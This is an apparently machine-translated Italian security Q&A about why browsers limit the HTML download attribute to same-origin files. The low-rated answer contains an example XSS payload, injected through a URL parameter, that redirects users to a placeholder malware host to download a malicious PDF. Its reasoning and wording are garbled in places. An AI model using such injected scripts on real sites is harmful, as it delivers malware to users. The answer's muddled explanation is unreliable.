Implicazioni sulla sicurezza dell'attributo di download

Naviga le tue risposte
7

L'attributo download in un elemento a indica al browser di forzare il download di un file che altrimenti verrebbe interpretato dal browser. Questo è molto comodo, poiché spesso gli utenti vogliono scaricare un file (ad esempio jpg) invece di visualizzarlo dal browser. 

<a href="link.jpg" download="myfile.jpg">Click here to download</a>

Alcuni browser bloccano l'attributo download quando il file non è accessibile dallo stesso protocollo, sullo stesso host e sulla stessa porta. Questo per me sembra un po 'inutile mentre rompe molti buoni casi d'uso per prevenire qualcosa che può essere aggirato in altri modi.

Quali sono le implicazioni sulla sicurezza che i browser cercano di proteggere? Qualche esempio reale utile?

    
posta user1156544 08.08.2018 - 22:52
fonte

1 risposta

0

È importante non solo nell'attributo a ma anche in altri. Il motivo è che sta cercando di capire se proviene dall'origine che indica lo stesso host e la stessa porta del tuo sito web.

se in ogni caso sei vulnerabile a un attacco che usa il tuo sito lo bloccherà. Questo può essere utile se un attaccante usa per es. XSS per reindirizzare e fare in modo che un utente scarichi un file dannoso.    Thng come:

  • File PDF dannoso

  • Malware

    Ad esempio:

www.super123site.com/hello.php?mesg=hello+world

Viene dalla stessa porta del tuo sito ...

Scenario di attacco: 

www.super123site.com/hello.php?mesg=<script> window.location.replace(www.malware.com:8099/maliciousPdf.pdf)</script>

Host diverso, diverse porte, bloccato ...

    
risposta data 14.09.2018 - 17:05
fonte

Leggi altre domande sui tag

Che cos'è un AUTH-KEY nella sicurezza dei computer? Posso ricevere tutti i pacchetti PADI per le connessioni PPPoE del mio ISP, è un problema?